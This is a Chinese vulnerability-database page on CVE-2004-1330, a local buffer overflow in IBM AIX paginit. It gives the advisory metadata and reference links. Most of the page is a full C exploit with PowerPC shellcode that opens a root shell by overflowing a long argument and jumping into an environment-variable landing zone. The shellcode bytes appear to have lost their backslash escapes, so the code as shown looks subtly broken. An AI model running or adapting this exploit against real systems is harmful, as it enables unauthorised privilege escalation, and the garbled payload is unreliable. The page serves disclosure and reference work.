IBM AIX PAGINIT本地缓冲区溢出漏洞-安全小百科

IBM AIX PAGINIT本地缓冲区溢出漏洞

漏洞ID	1108380	漏洞类型	缓冲区溢出
发布时间	2004-12-20	更新时间	2005-10-20
CVE编号	CVE-2004-1330	CNNVD-ID	CNNVD-200412-316
漏洞平台	AIX	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/699
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-316

|漏洞详情

AIX5.1至5.3版本的paginit存在缓冲区溢出漏洞。本地用户借助超长用户名执行任意代码。

|漏洞EXP

/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb cs ru nl>
*/

#define RETADDR 0x2ff22c90

char shellcode[] =
"x7cxa5x2ax79"
"x40x82xffxfd"      
"x7cxa8x02xa6"      
"x38xe0x11x11"
"x39x20x48x11"      
"x7cxc7x48x10"      
"x38x46xc9x05"      
"x39x25x11x11"
"x38x69xefx17"      
"x38x87xeexef"      
"x7cxc9x03xa6"      
"x4ex80x04x20"
"x2fx62x69x6e"      
"x2fx73x68x00"
;

char envlabel[] = "X=";

void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];
  char buf[8000];
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);
  
  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel,sizeof(envlabel)-1);
  // landingzone 
  for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4) 
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);  
  code[sizeof(code)-1] = 0;
  
  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0; 
  
  p = buf;
  p += 4114;
  printint(p,RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}

// milw0rm.com [2004-12-20]

|参考资料

来源:BID
名称:12043
链接:http://www.securityfocus.com/bid/12043
来源:XF
名称:aix-paginit-username-bo(18618)
链接:http://xforce.iss.net/xforce/xfdb/18618
来源:www.frsirt.com
链接:http://www.frsirt.com/exploits/20041220.paginit.c.php
来源:AIXAPAR
名称:IY64522
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY64522&apar;=only
来源:AIXAPAR
名称:IY64358
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY64358&apar;=only
来源:AIXAPAR
名称:IY64312
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY64312&apar;=only
来源:BUGTRAQ
名称:20041220AIX5.1/5.2/5.3localrootexploits
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110355931920123&w;=2

相关推荐: Leafnode fetchnews Client Remote Denial of Service Vulnerability

Leafnode fetchnews Client Remote Denial of Service Vulnerability 漏洞ID 1099626 漏洞类型 Design Error 发布时间 2003-09-04 更新时间 2003-09-04 CV…

文章版权归作者所有，未经允许请勿转载。

THE END